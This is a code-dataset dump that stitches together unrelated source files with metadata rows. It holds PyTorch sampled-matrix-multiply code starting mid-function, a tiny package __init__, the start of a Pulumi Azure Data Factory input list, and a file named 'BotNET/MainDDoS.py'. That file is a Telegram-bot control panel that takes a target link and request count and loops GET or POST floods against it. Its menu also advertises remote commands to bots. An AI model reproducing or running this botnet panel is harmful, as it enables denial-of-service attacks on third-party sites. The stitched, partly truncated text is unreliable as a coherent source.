C_approx = matmul_approx_bwd_func.apply(A_top_k_cols, B_top_k_rows,sample_ratio_bwd,minimal_k_bwd,sample_ratio_wu,minimal_k_wu)
if bias is not None:
C_approx += bias
return C_approx
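# Illustrative self-check (hypothetical helper, not called anywhere): compares
# the top-k approximation against the exact product on random data and returns
# the relative error.
def _demo_linear_top_k():
    x = torch.randn(32, 512)
    W = torch.randn(512, 128)
    b = torch.zeros(128)
    y_exact = torch.addmm(b, x, W)
    y_approx = linear_top_k(x, W, b, sample_ratio=0.25, minimal_k=16)
    return (y_exact - y_approx).norm() / y_exact.norm()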
''' Approximates the matrix multiply A*B+b by sampling the column-row pairs with the largest norm
the norm is sampled from a subset of the reduction dimension
A - input matrix, shape (N,*,in_features) where '*' means any number of additional dimensions
B - input matrices, shape (in_features, out_features)
bias - bias vector, shape (out_features)
sample_ratio - Ratio of column-row pairs to sample
minimal_k - Minimal number of column-row pairs to keep in the sampling
note: B is not transposed
output: A*B+b, shape (N,*,out_features)
'''
def linear_top_k_approx(A,B,bias,sample_ratio, minimal_k,sample_ratio_bwd=None,minimal_k_bwd=None,sample_ratio_wu=None,minimal_k_wu=None):
#print("Sanity check - top_k_approx is used")
#print("A size: {}".format(A.size()))
#print("B size: {}".format(B.size()))
#print("bias size: {}".format(bias.size()))
#print("sample_ratio: {}".format(sample_ratio))
#print("minimal_k: {}".format(minimal_k))
in_features = A.size()[-1]
# calculate the number of column-row pairs to sample for the forward propagation phase
k_candidate = int(float(in_features)*sample_ratio)
# make k at least minimal_k
k = min(max(k_candidate,minimal_k),in_features)
# if because of minimal_k or sample_ratio k equals the number of features, perform full matmul instead of approximating
if k == in_features:
# no need to sample. perform normal matmul
if A.dim() == 2 and bias is not None:
# fused op is marginally faster
C = torch.addmm(bias, A, B)
else:
C = torch.matmul(A, B)
if bias is not None:
C += bias
return C
# calculate norms of the columns of A and rows of B
# instead of calculating the exact norms, we sample a subset of A rows and B columns
# and calculate the norm over them. This serves two purposes:
# 1. faster estimation of the norm
# 2. introduces some randomness to avoid always sampling the same high-norm features
with torch.no_grad():
if A.dim() == 2:
a_num_rows = A.size()[0]
a_sample_start = torch.randint(a_num_rows-9,size=(1,),dtype=torch.long)
a_col_norms = torch.norm(A[a_sample_start:a_sample_start+10:],dim=0)
else:
            # since we sample across in_features, consider other dimensions as a single dimension for sampling purposes
a_num_rows = A.view(-1,in_features).size()[0]
a_sample_start = torch.randint(a_num_rows-9,size=(1,),dtype=torch.long)
a_col_norms = torch.norm(A.view(-1,in_features)[a_sample_start:a_sample_start+10,:],dim=0)
b_num_cols = B.size()[1]
b_sample_start = torch.randint(b_num_cols-9,size=(1,),dtype=torch.long)
b_row_norms = torch.norm(B[:,b_sample_start:b_sample_start+10],dim=1)
# multiply both norms element-wise to and pick the indices of the top K column-row pairs
norm_mult = torch.mul(a_col_norms,b_row_norms)
#top_k_indices = torch.topk(norm_mult,k)[1]
top_k_indices = topk_indices(norm_mult,k)
# pick top-k column-row pairs to form new smaller matrices
A_top_k_cols = torch.index_select(A,dim = -1, index = top_k_indices)
B_top_k_rows = torch.index_select(B,dim = 0, index = top_k_indices)
# multiply smaller matrices
if sample_ratio_bwd is None and sample_ratio_wu is None:
if A.dim() == 2 and bias is not None:
# fused op is marginally faster
C_approx = torch.addmm(bias, A_top_k_cols, B_top_k_rows)
else:
C_approx = torch.matmul(A_top_k_cols, B_top_k_rows)
if bias is not None:
C_approx += bias
else:
# The following code will be used to apply additional sampling in the backward pass but update only the
# sub-tensors sampled in the forward pass.
# For simplicity, we don't optimize for torch.addmm usage in this case
C_approx = matmul_approx_bwd_func.apply(A_top_k_cols, B_top_k_rows,sample_ratio_bwd,minimal_k_bwd,sample_ratio_wu,minimal_k_wu)
if bias is not None:
C_approx += bias
return C_approx
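# Illustrative look at the 10-row norm estimate used above (hypothetical helper):
# only the *ranking* of the column norms matters for picking pairs, so a sliced
# estimate trades exactness for speed plus a little randomness.
def _demo_norm_estimate():
    A = torch.randn(1024, 512)
    exact = torch.norm(A, dim=0)
    start = int(torch.randint(1024 - 9, size=(1,)))
    estimate = torch.norm(A[start:start + 10, :], dim=0)
    return exact, estimate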
''' Approximates the matrix multiply A*B+b
A - input matrix, shape (N,*,in_features) where '*' means any number of additional dimensions
B - input matrices, shape (in_features, out_features)
bias - bias vector, shape (out_features)
sample_ratio - Ratio of column-row pairs to sample
minimal_k - Minimal number of column-row pairs to keep in the sampling
with_replacement - True means sampling is done with replacement, False means sampling without replacement
optimal_prob - True means sampling probability is proportional to |Ai|*|Bj|. False means uniform distribution.
scale - True means each column-row is scaled by 1/sqrt(K*pi) to ensure bias 0
'''
def linear_random_sampling(A,B,bias,sample_ratio, minimal_k, with_replacement, optimal_prob, scale,sample_ratio_bwd=None,minimal_k_bwd=None,sample_ratio_wu=None,minimal_k_wu=None):
#print("Sanity check - linear_sampling is used")
#print("A size: {}".format(A.size()))
#print("B size: {}".format(B.size()))
#if bias is not None:
# print("bias size: {}".format(bias.size()))
#else:
# print("no bias")
#print("sample_ratio: {}".format(sample_ratio))
#print("minimal_k: {}".format(minimal_k))
#print("with_replacement: {}".format(with_replacement))
#print("optimal_prob: {}".format(optimal_prob))
#print("scale: {}".format(scale))
#print("A mean: {}".format(A.mean()))
#print("A std: {}".format(A.std()))
#print("B mean: {}".format(B.mean()))
#print("B std: {}".format(B.std()))
in_features = A.size()[-1]
device = A.device
# calculate the number of column-row pairs to sample
k_candidate = int(float(in_features)*sample_ratio)
# make k at least minimal_k
k = min(max(k_candidate,minimal_k),in_features)
# if because of minimal_k or sample_ratio k equals the number of features, perform full matmul instead of approximating
if k == in_features:
# no need to sample. perform normal matmul
if A.dim() == 2 and bias is not None:
# fused op is marginally faster
C = torch.addmm(bias, A, B)
else:
C = torch.matmul(A, B)
if bias is not None:
C += bias
return C
if optimal_prob == True:
with torch.no_grad():
# calculate norms of the columns of A and rows of B
if A.dim() == 2:
a_col_norms = torch.norm(A,dim=0)
else:
                # since we sample across in_features, consider other dimensions as a single dimension for sampling purposes
a_col_norms = torch.norm(A.view(-1,in_features),dim=0)
b_row_norms = torch.norm(B,dim=1)
# multiply both norms element-wise
norm_mult = torch.mul(a_col_norms,b_row_norms)
# use epsilon-optimal sampling to allow learning random weights and to bound the scaling factor
epsilon = 0.1
if epsilon > 0:
sum_norm_mult = torch.sum(norm_mult)
norm_mult = torch.div(norm_mult, sum_norm_mult)
uniform = torch.ones_like(norm_mult)/in_features
norm_mult = (1-epsilon)*norm_mult + epsilon*uniform
# no need to normalize, it is already done by torch.multinomial
# calculate number of nonzero elements in norm_mult. this serves
# two purposes:
# 1. Possibly reduce number of sampled pairs, as zero elements in norm_mult will not contribute to the result
# 2. Prevents scaling of zero values
nnz = (norm_mult!=0).sum()
if nnz == 0:
#print("zero multiply detected! scenario not optimzied (todo)")
return torch.nn.functional.linear(A, B.t(),bias)
k = min(k,nnz)
indices = torch.multinomial(norm_mult,k,replacement=with_replacement)
# pick k column-row pairs to form new smaller matrices
A_top_k_cols = torch.index_select(A, dim=-1, index=indices)
B_top_k_rows = torch.index_select(B, dim=0, index=indices)
if scale == True:
# when sampling without replacement a more complicated scaling factor is required (see Horvitz and Thompson, 1952)
assert(with_replacement == True)
# scale column-row pairs by 1/(k*p_i) to get unbiased estimation
with torch.no_grad():
sum_norm_mult = torch.sum(norm_mult)
scale_factors = torch.div(sum_norm_mult,torch.mul(norm_mult,k))
scale_matrix = torch.diag(scale_factors[indices])
A_top_k_cols = torch.matmul(A_top_k_cols, scale_matrix)
else:
# uniform sampling
if with_replacement == True:
indices = torch.randint(low=0,high=in_features,size=(k,),device=device)
else:
uniform_dist = torch.ones(in_features,device=device)
indices = torch.multinomial(uniform_dist,k,replacement=False)
# pick k column-row pairs to form new smaller matrices
A_top_k_cols = torch.index_select(A, dim=-1, index=indices)
B_top_k_rows = torch.index_select(B, dim=0, index=indices)
if scale == True:
# scale column-row pairs by 1/(k*p_i) to get unbiased estimation
# in case of uniform distribution, p_i = 1/in_features when sampling with replacement
# when sampling without replacement a different scaling factor is required (see Horvitz and Thompson, 1952), but
# for uniform sampling it turns to be in_features/k as well
scale_factor = in_features/k
scale_matrix = torch.diag(torch.empty((k,), device=device).fill_(scale_factor))
A_top_k_cols = torch.matmul(A_top_k_cols, scale_matrix)
# multiply smaller matrices
if sample_ratio_bwd is None and sample_ratio_wu is None:
if A.dim() == 2 and bias is not None:
# fused op is marginally faster
C_approx = torch.addmm(bias, A_top_k_cols, B_top_k_rows)
else:
C_approx = torch.matmul(A_top_k_cols, B_top_k_rows)
if bias is not None:
C_approx += bias
else:
# The following code will be used to apply additional sampling in the backward pass but update only the
# sub-tensors sampled in the forward pass.
# For simplicity, we don't optimize for torch.addmm usage in this case
C_approx = matmul_approx_bwd_func.apply(A_top_k_cols, B_top_k_rows,sample_ratio_bwd,minimal_k_bwd,sample_ratio_wu,minimal_k_wu)
if bias is not None:
C_approx += bias
return C_approx
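# Illustrative unbiasedness check (hypothetical helper): each sampled column-row
# pair is rescaled by 1/(k * p_i), so averaging many independent estimates should
# approach the exact product.
def _demo_unbiased_sampling(trials=100):
    x = torch.randn(8, 64)
    W = torch.randn(64, 16)
    exact = torch.matmul(x, W)
    acc = torch.zeros_like(exact)
    for _ in range(trials):
        acc = acc + linear_random_sampling(x, W, None, sample_ratio=0.25, minimal_k=4,
                                           with_replacement=True, optimal_prob=True, scale=True)
    return (acc / trials - exact).norm() / exact.norm()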
def linear_uniform_sampling(A,B,bias,sample_ratio, minimal_k):
#print("Sanity check - uniform_sampling is used")
# calculate the number of column-row pairs to sample for the forward propagation phase
k_candidate = int(float(B.size()[1])*sample_ratio)
    # make k at least minimal_k (similar to meProp)
k = min(max(k_candidate,minimal_k),B.size()[1])
    indices = torch.randperm(B.size()[1], device=A.device)[:k]  # follow A's device instead of hardcoding .cuda()
# pick top-k column-row pairs to form new smaller matrices
A_top_k_cols = torch.index_select(A, dim=1, index=indices)
B_top_k_rows = torch.index_select(B, dim=1, index=indices)
# multiply smaller matrices
C_approx = torch.nn.functional.linear(A_top_k_cols, B_top_k_rows,bias)
return C_approx
''' Approximates the matrix multiply A*B+b using Bernoulli sampling
A - input matrix, shape (N,*,in_features) where '*' means any number of additional dimensions
B - input matrices, shape (in_features, out_features)
bias - bias vector, shape (out_features)
sample_ratio - Ratio of column-row pairs to sample
minimal_k - Minimal number of column-row pairs to keep in the sampling
scale - True means each column-row is scaled by 1/sqrt(K*pi) to ensure bias 0
'''
def linear_bernoulli_sampling(A,B,bias,sample_ratio, minimal_k, scale,sample_ratio_bwd=None,minimal_k_bwd=None,sample_ratio_wu=None,minimal_k_wu=None):
#print("Sanity check - bernoulli_sampling is used")
#print("A size: {}".format(A.size()))
#print("B size: {}".format(B.size()))
#if bias is not None:
# print("bias size: {}".format(bias.size()))
#else:
# print("no bias")
#print("sample_ratio: {}".format(sample_ratio))
#print("minimal_k: {}".format(minimal_k))
#print("scale: {}".format(scale))
#print("A mean: {}".format(A.mean()))
#print("A std: {}".format(A.std()))
#print("B mean: {}".format(B.mean()))
#print("B std: {}".format(B.std()))
in_features = A.size()[-1]
device = A.device
# calculate the number of column-row pairs to sample
k_candidate = int(float(in_features)*sample_ratio)
# make k at least minimal_k
k = min(max(k_candidate,minimal_k),in_features)
# if because of minimal_k or sample_ratio k equals the number of features, perform full matmul instead of approximating
if k == in_features:
# no need to sample. perform normal matmul
if A.dim() == 2 and bias is not None:
# fused op is marginally faster
C = torch.addmm(bias, A, B)
else:
C = torch.matmul(A, B)
if bias is not None:
C += bias
return C
with torch.no_grad():
# calculate norms of the columns of A and rows of B
if A.dim() == 2:
a_col_norms = torch.norm(A,dim=0)
else:
            # since we sample across in_features, consider other dimensions as a single dimension for sampling purposes
a_col_norms = torch.norm(A.view(-1,in_features),dim=0)
b_row_norms = torch.norm(B,dim=1)
# multiply both norms element-wise
norm_mult = torch.mul(a_col_norms,b_row_norms)
sum_norm_mult = norm_mult.sum()
# calculate number of nonzero elements in norm_mult. this serves
# two purposes:
# 1. Possibly reduce number of sampled pairs, as zero elements in norm_mult will not contribute to the result
# 2. Prevents scaling of zero values
nnz = (norm_mult!=0).sum()
if nnz == 0:
#print("zero multiply detected! scenario not optimzied (todo)")
return torch.nn.functional.linear(A, B.t(),bias)
k = min(k,nnz)
prob_dist = k * torch.div(norm_mult,sum_norm_mult)
prob_dist = prob_dist.clamp(min=0, max=1)
# use epsilon-optimal sampling to allow learning random weights and to bound the scaling factor
epsilon = 0.1
if epsilon > 0:
uniform = torch.ones_like(prob_dist)/in_features
prob_dist = (1-epsilon)*prob_dist + epsilon*uniform
indices = torch.bernoulli(prob_dist).nonzero(as_tuple=True)[0]
if len(indices) == 0:
print("no elements selected - hmm")
indices = torch.arange(k, device=device)
# sample column-row pairs to form new smaller matrices
A_top_k_cols = torch.index_select(A, dim=-1, index=indices)
B_top_k_rows = torch.index_select(B, dim=0, index=indices)
if scale == True:
# scale column-row pairs by 1/(p_i) to get unbiased estimation
with torch.no_grad():
scale_factors = torch.div(1,prob_dist)
scale_matrix = torch.diag(scale_factors[indices])
A_top_k_cols = torch.matmul(A_top_k_cols, scale_matrix)
# multiply smaller matrices
if sample_ratio_bwd is None and sample_ratio_wu is None:
if A.dim() == 2 and bias is not None:
# fused op is marginally faster
C_approx = torch.addmm(bias, A_top_k_cols, B_top_k_rows)
else:
C_approx = torch.matmul(A_top_k_cols, B_top_k_rows)
if bias is not None:
C_approx += bias
else:
# The following code will be used to apply additional sampling in the backward pass but update only the
# sub-tensors sampled in the forward pass.
# For simplicity, we don't optimize for torch.addmm usage in this case
C_approx = matmul_approx_bwd_func.apply(A_top_k_cols, B_top_k_rows,sample_ratio_bwd,minimal_k_bwd,sample_ratio_wu,minimal_k_wu)
if bias is not None:
C_approx += bias
return C_approx
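# Minimal usage sketch (hypothetical values): unlike the fixed-k schemes above,
# Bernoulli sampling keeps a *random* number of column-row pairs whose expected
# count is roughly k, each rescaled by 1/p_i.
def _demo_bernoulli_call():
    x = torch.randn(4, 256)
    W = torch.randn(256, 32)
    return linear_bernoulli_sampling(x, W, None, sample_ratio=0.1, minimal_k=8, scale=True)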
# This function calculates exact matmul in the forward pass and approximate one in the backward pass
# it is intended to allow approximation of the sampled matrix multiply in approx_linear_func backward pass
# while updating all the matrix elements and not only the elements that were sampled in the forward pass
class matmul_approx_bwd_func(torch.autograd.Function):
@staticmethod
def forward(ctx, inputs, weights, sample_ratio_bwd,minimal_k_bwd,sample_ratio_wu,minimal_k_wu):
ctx.save_for_backward(inputs,weights)
#store non-tensor objects in ctx
ctx.sample_ratio_bwd = sample_ratio_bwd
ctx.minimal_k_bwd = minimal_k_bwd
ctx.sample_ratio_wu = sample_ratio_wu
ctx.minimal_k_wu = minimal_k_wu
return torch.matmul(inputs, weights)
@staticmethod
def backward(ctx, grad_output):
inputs, weights = ctx.saved_tensors
#print('calculating matmul_approx_bwd_func bwd pass! sample_ratio_bwd={},minimal_k_bwd={},sample_ratio_wu={},minimal_k_wu={}'.format(ctx.sample_ratio_bwd,ctx.minimal_k_bwd,ctx.sample_ratio_wu,ctx.minimal_k_wu))
#grad_input = torch.matmul(grad_output, weights.t())
grad_input = approx_linear_forward_xA_b(grad_output, weights.t(), None, ctx.sample_ratio_bwd, ctx.minimal_k_bwd,None,None,None,None)
#grad_weight = torch.matmul(inputs.t(),grad_output)
grad_weight = approx_linear_forward_xA_b(inputs.t(), grad_output, None, ctx.sample_ratio_wu, ctx.minimal_k_wu, None, None, None, None)
return grad_input, grad_weight, None, None, None, None
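# Usage sketch (hypothetical ratios): the Function above computes an exact
# forward matmul but routes both backward products through the sampled
# approximation, so activations are exact while gradients are approximate.
def _demo_sampled_backward():
    x = torch.randn(4, 64, requires_grad=True)
    W = torch.randn(64, 16, requires_grad=True)
    out = matmul_approx_bwd_func.apply(x, W, 0.5, 8, 0.5, 8)
    out.sum().backward()
    return x.grad, W.grad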
| 47.083495 | 254 | 0.663106 | 3,662 | 24,248 | 4.175314 | 0.08083 | 0.066906 | 0.026553 | 0.014716 | 0.808829 | 0.79032 | 0.78535 | 0.764356 | 0.742838 | 0.72688 | 0 | 0.005711 | 0.241793 | 24,248 | 514 | 255 | 47.175097 | 0.825945 | 0.380155 | 0 | 0.723214 | 0 | 0 | 0.002075 | 0 | 0 | 0 | 0 | 0.003891 | 0.004464 | 1 | 0.040179 | false | 0 | 0.008929 | 0 | 0.120536 | 0.004464 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
720bc31bafdc3b7643a912bd39bdc9f7d7e8062a | 227 | py | Python | samepy/utils/__init__.py | Ganariya/acopy | 339a35313a5c871d98d8f4444df7661600c6ff00 | [
"Apache-2.0"
] | 59 | 2018-09-06T23:52:56.000Z | 2022-03-31T09:35:22.000Z | samepy/utils/__init__.py | Ganariya/acopy | 339a35313a5c871d98d8f4444df7661600c6ff00 | [
"Apache-2.0"
] | 11 | 2018-11-22T16:06:20.000Z | 2021-11-15T17:47:39.000Z | samepy/utils/__init__.py | Ganariya/acopy | 339a35313a5c871d98d8f4444df7661600c6ff00 | [
"Apache-2.0"
] | 16 | 2018-08-23T12:15:45.000Z | 2022-02-24T04:56:17.000Z | # -*- coding: utf-8 -*-
from . import data # noqa: F401
from . import plot # noqa: F401
from .general import looper # noqa: F401
from .general import is_plot_enabled # noqa: F401
from .general import positive # noqa: F401
| 32.428571 | 50 | 0.696035 | 33 | 227 | 4.727273 | 0.424242 | 0.25641 | 0.307692 | 0.365385 | 0.480769 | 0 | 0 | 0 | 0 | 0 | 0 | 0.087912 | 0.198238 | 227 | 6 | 51 | 37.833333 | 0.769231 | 0.334802 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
9d5514705782b1d3b0ba23f868218f731979ea76 | 4,720 | py | Python | BotNET/MainDDoS.py | Reedus0/BotNET | f831abeb291331bff502a58393490b3551eb47c5 | [
"MIT"
] | 7 | 2020-08-10T18:52:21.000Z | 2020-12-09T14:59:45.000Z | BotNET/MainDDoS.py | Reedus0/BotNET | f831abeb291331bff502a58393490b3551eb47c5 | [
"MIT"
] | 1 | 2020-08-17T12:00:47.000Z | 2020-08-17T12:00:47.000Z | BotNET/MainDDoS.py | Reedus0/BotNET | f831abeb291331bff502a58393490b3551eb47c5 | [
"MIT"
] | 2 | 2020-08-17T11:56:01.000Z | 2020-11-06T13:40:04.000Z | import telebot
import config
from dbworker import set_state, get_current_state
from POSTGET import postDDoS, getDDoS
client = telebot.TeleBot(config.config["token"])
link = []
data = []
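# Conversation state flow (as implemented by the handlers below):
#   S_DDOS_A --"GET"-->  S_DDOS_GET1_A (link) --> S_DDOS_GET2_A (count) --> S_LOGINED_A
#   S_DDOS_A --"POST"--> S_DDOS_POST1_A (link) --> S_DDOS_POST2_A (data) --> S_DDOS_POST3_A (count) --> S_LOGINED_A
#   Typing "Exit" at any prompt returns to S_DDOS_A (or to S_LOGINED_A from the main menu).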
def mainDDoS(message):
if(message.text == "Exit"):
client.send_message(message.chat.id, 'Logged in - ')
client.send_message(message.chat.id, "Commands: ")
client.send_message(message.chat.id, 'DDOS - enter in DDoS panel')
client.send_message(message.chat.id, 'Check - check new bots')
client.send_message(message.chat.id, 'Bot name + cmd - command line')
client.send_message(message.chat.id, 'online - bots online')
set_state(message.chat.id, config.States.S_LOGINED_A)
elif(message.text == "GET"):
client.send_message(message.chat.id, 'Enter link. To exit type "Exit" ')
set_state(message.chat.id, config.States.S_DDOS_GET1_A)
elif (message.text == "POST"):
client.send_message(message.chat.id, 'Enter link. To exit type "Exit" ')
set_state(message.chat.id, config.States.S_DDOS_POST1_A)
@client.message_handler(func=lambda message: get_current_state(message.chat.id) == config.States.S_DDOS_GET1_A)
def GETDDOS1(message):
if(message.text != "Exit"):
link.append(message.text)
client.send_message(message.chat.id, 'Enter count of operations. To exit type "Exit" ')
set_state(message.chat.id, config.States.S_DDOS_GET2_A)
else:
client.send_message(message.chat.id, 'Choose type of DDoS:')
client.send_message(message.chat.id, 'GET')
client.send_message(message.chat.id, 'POST')
client.send_message(message.chat.id, 'To exit type "Exit"')
set_state(message.chat.id, config.States.S_DDOS_A)
@client.message_handler(func=lambda message: get_current_state(message.chat.id) == config.States.S_DDOS_GET2_A)
def GETDDOS2(message):
if(message.text != "Exit"):
        client.send_message(message.chat.id, 'DDoS has begun')
        operations = int(message.text)
        for i in range(operations):
            getDDoS(link[-1])  # use the most recently entered link, not a stale first entry
        client.send_message(message.chat.id, 'DDoS has ended, you have been redirected to the main menu')
set_state(message.chat.id, config.States.S_LOGINED_A)
else:
client.send_message(message.chat.id, 'Choose type of DDoS:')
client.send_message(message.chat.id, 'GET')
client.send_message(message.chat.id, 'POST')
client.send_message(message.chat.id, 'To exit type "Exit"')
set_state(message.chat.id, config.States.S_DDOS_A)
@client.message_handler(func=lambda message: get_current_state(message.chat.id) == config.States.S_DDOS_POST1_A)
def POSTDDOS1(message):
if(message.text != "Exit"):
link.append(message.text)
client.send_message(message.chat.id, 'Enter data of POST request. To exit type "Exit" ')
set_state(message.chat.id, config.States.S_DDOS_POST2_A)
else:
client.send_message(message.chat.id, 'Choose type of DDoS:')
client.send_message(message.chat.id, 'GET')
client.send_message(message.chat.id, 'POST')
client.send_message(message.chat.id, 'To exit type "Exit"')
set_state(message.chat.id, config.States.S_DDOS_A)
@client.message_handler(func=lambda message: get_current_state(message.chat.id) == config.States.S_DDOS_POST2_A)
def POSTDDOS2(message):
if(message.text != "Exit"):
data.append(message.text)
client.send_message(message.chat.id, 'Enter count of operations. To exit type "Exit" ')
set_state(message.chat.id, config.States.S_DDOS_POST3_A)
else:
client.send_message(message.chat.id, 'Choose type of DDoS:')
client.send_message(message.chat.id, 'GET')
client.send_message(message.chat.id, 'POST')
client.send_message(message.chat.id, 'To exit type "Exit"')
set_state(message.chat.id, config.States.S_DDOS_A)
@client.message_handler(func=lambda message: get_current_state(message.chat.id) == config.States.S_DDOS_POST3_A)
def POSTDDOS3(message):
if(message.text != "Exit"):
        client.send_message(message.chat.id, 'DDoS has begun')
        operations = int(message.text)
        for i in range(operations):
            postDDoS(link[-1], data[-1])  # use the most recently entered link and data
        client.send_message(message.chat.id, 'DDoS has ended, you have been redirected to the main menu')
set_state(message.chat.id, config.States.S_LOGINED_A)
else:
client.send_message(message.chat.id, 'Choose type of DDoS:')
client.send_message(message.chat.id, 'GET')
client.send_message(message.chat.id, 'POST')
client.send_message(message.chat.id, 'To exit type "Exit"')
set_state(message.chat.id, config.States.S_DDOS_A) | 49.166667 | 112 | 0.690678 | 685 | 4,720 | 4.59562 | 0.119708 | 0.185197 | 0.218869 | 0.266836 | 0.880241 | 0.872618 | 0.834498 | 0.821474 | 0.820839 | 0.820839 | 0 | 0.004638 | 0.177754 | 4,720 | 96 | 113 | 49.166667 | 0.806493 | 0 | 0 | 0.568182 | 0 | 0 | 0.150392 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.068182 | false | 0 | 0.045455 | 0 | 0.113636 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
dfa97af6ade78122806c64eaf2c404a191381c8f | 926,324 | py | Python | sdk/python/pulumi_azure_nextgen/datafactory/v20170901preview/_inputs.py | test-wiz-sec/pulumi-azure-nextgen | 20a695af0d020b34b0f1c336e1b69702755174cc | [
"Apache-2.0"
] | null | null | null | sdk/python/pulumi_azure_nextgen/datafactory/v20170901preview/_inputs.py | test-wiz-sec/pulumi-azure-nextgen | 20a695af0d020b34b0f1c336e1b69702755174cc | [
"Apache-2.0"
] | null | null | null | sdk/python/pulumi_azure_nextgen/datafactory/v20170901preview/_inputs.py | test-wiz-sec/pulumi-azure-nextgen | 20a695af0d020b34b0f1c336e1b69702755174cc | [
"Apache-2.0"
] | null | null | null | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union
from ... import _utilities, _tables
__all__ = [
'ActivityDependencyArgs',
'ActivityPolicyArgs',
'AmazonMWSLinkedServiceArgs',
'AmazonMWSObjectDatasetArgs',
'AmazonRedshiftLinkedServiceArgs',
'AmazonS3DatasetArgs',
'AmazonS3LinkedServiceArgs',
'AvroFormatArgs',
'AzureBatchLinkedServiceArgs',
'AzureBlobDatasetArgs',
'AzureDataLakeAnalyticsLinkedServiceArgs',
'AzureDataLakeStoreDatasetArgs',
'AzureDataLakeStoreLinkedServiceArgs',
'AzureDatabricksLinkedServiceArgs',
'AzureKeyVaultLinkedServiceArgs',
'AzureKeyVaultSecretReferenceArgs',
'AzureMLLinkedServiceArgs',
'AzureMySqlLinkedServiceArgs',
'AzureMySqlTableDatasetArgs',
'AzurePostgreSqlLinkedServiceArgs',
'AzurePostgreSqlTableDatasetArgs',
'AzureSearchIndexDatasetArgs',
'AzureSearchLinkedServiceArgs',
'AzureSqlDWLinkedServiceArgs',
'AzureSqlDWTableDatasetArgs',
'AzureSqlDatabaseLinkedServiceArgs',
'AzureSqlTableDatasetArgs',
'AzureStorageLinkedServiceArgs',
'AzureTableDatasetArgs',
'CassandraLinkedServiceArgs',
'CassandraTableDatasetArgs',
'ConcurLinkedServiceArgs',
'ConcurObjectDatasetArgs',
'ControlActivityArgs',
'CosmosDbLinkedServiceArgs',
'CouchbaseLinkedServiceArgs',
'CouchbaseTableDatasetArgs',
'CustomDataSourceLinkedServiceArgs',
'CustomDatasetArgs',
'DatasetBZip2CompressionArgs',
'DatasetDeflateCompressionArgs',
'DatasetGZipCompressionArgs',
'DatasetZipDeflateCompressionArgs',
'Db2LinkedServiceArgs',
'DocumentDbCollectionDatasetArgs',
'DrillLinkedServiceArgs',
'DrillTableDatasetArgs',
'DynamicsEntityDatasetArgs',
'DynamicsLinkedServiceArgs',
'EloquaLinkedServiceArgs',
'EloquaObjectDatasetArgs',
'EntityReferenceArgs',
'ExecutionActivityArgs',
'FactoryIdentityArgs',
'FactoryVSTSConfigurationArgs',
'FileServerLinkedServiceArgs',
'FileShareDatasetArgs',
'FtpServerLinkedServiceArgs',
'GoogleBigQueryLinkedServiceArgs',
'GoogleBigQueryObjectDatasetArgs',
'GreenplumLinkedServiceArgs',
'GreenplumTableDatasetArgs',
'HBaseLinkedServiceArgs',
'HBaseObjectDatasetArgs',
'HDInsightLinkedServiceArgs',
'HDInsightOnDemandLinkedServiceArgs',
'HdfsLinkedServiceArgs',
'HiveLinkedServiceArgs',
'HiveObjectDatasetArgs',
'HttpDatasetArgs',
'HttpLinkedServiceArgs',
'HubspotLinkedServiceArgs',
'HubspotObjectDatasetArgs',
'ImpalaLinkedServiceArgs',
'ImpalaObjectDatasetArgs',
'IntegrationRuntimeComputePropertiesArgs',
'IntegrationRuntimeCustomSetupScriptPropertiesArgs',
'IntegrationRuntimeDataProxyPropertiesArgs',
'IntegrationRuntimeReferenceArgs',
'IntegrationRuntimeSsisCatalogInfoArgs',
'IntegrationRuntimeSsisPropertiesArgs',
'IntegrationRuntimeVNetPropertiesArgs',
'JiraLinkedServiceArgs',
'JiraObjectDatasetArgs',
'JsonFormatArgs',
'LinkedIntegrationRuntimeKeyArgs',
'LinkedIntegrationRuntimeRbacArgs',
'LinkedServiceReferenceArgs',
'MagentoLinkedServiceArgs',
'MagentoObjectDatasetArgs',
'ManagedIntegrationRuntimeArgs',
'MariaDBLinkedServiceArgs',
'MariaDBTableDatasetArgs',
'MarketoLinkedServiceArgs',
'MarketoObjectDatasetArgs',
'MongoDbCollectionDatasetArgs',
'MongoDbLinkedServiceArgs',
'MultiplePipelineTriggerArgs',
'MySqlLinkedServiceArgs',
'NetezzaLinkedServiceArgs',
'NetezzaTableDatasetArgs',
'ODataLinkedServiceArgs',
'ODataResourceDatasetArgs',
'OdbcLinkedServiceArgs',
'OracleLinkedServiceArgs',
'OracleTableDatasetArgs',
'OrcFormatArgs',
'ParameterSpecificationArgs',
'ParquetFormatArgs',
'PaypalLinkedServiceArgs',
'PaypalObjectDatasetArgs',
'PhoenixLinkedServiceArgs',
'PhoenixObjectDatasetArgs',
'PipelineReferenceArgs',
'PostgreSqlLinkedServiceArgs',
'PrestoLinkedServiceArgs',
'PrestoObjectDatasetArgs',
'QuickBooksLinkedServiceArgs',
'QuickBooksObjectDatasetArgs',
'RelationalTableDatasetArgs',
'ResponsysLinkedServiceArgs',
'ResponsysObjectDatasetArgs',
'RetryPolicyArgs',
'SalesforceLinkedServiceArgs',
'SalesforceMarketingCloudLinkedServiceArgs',
'SalesforceMarketingCloudObjectDatasetArgs',
'SalesforceObjectDatasetArgs',
'SapBWLinkedServiceArgs',
'SapCloudForCustomerLinkedServiceArgs',
'SapCloudForCustomerResourceDatasetArgs',
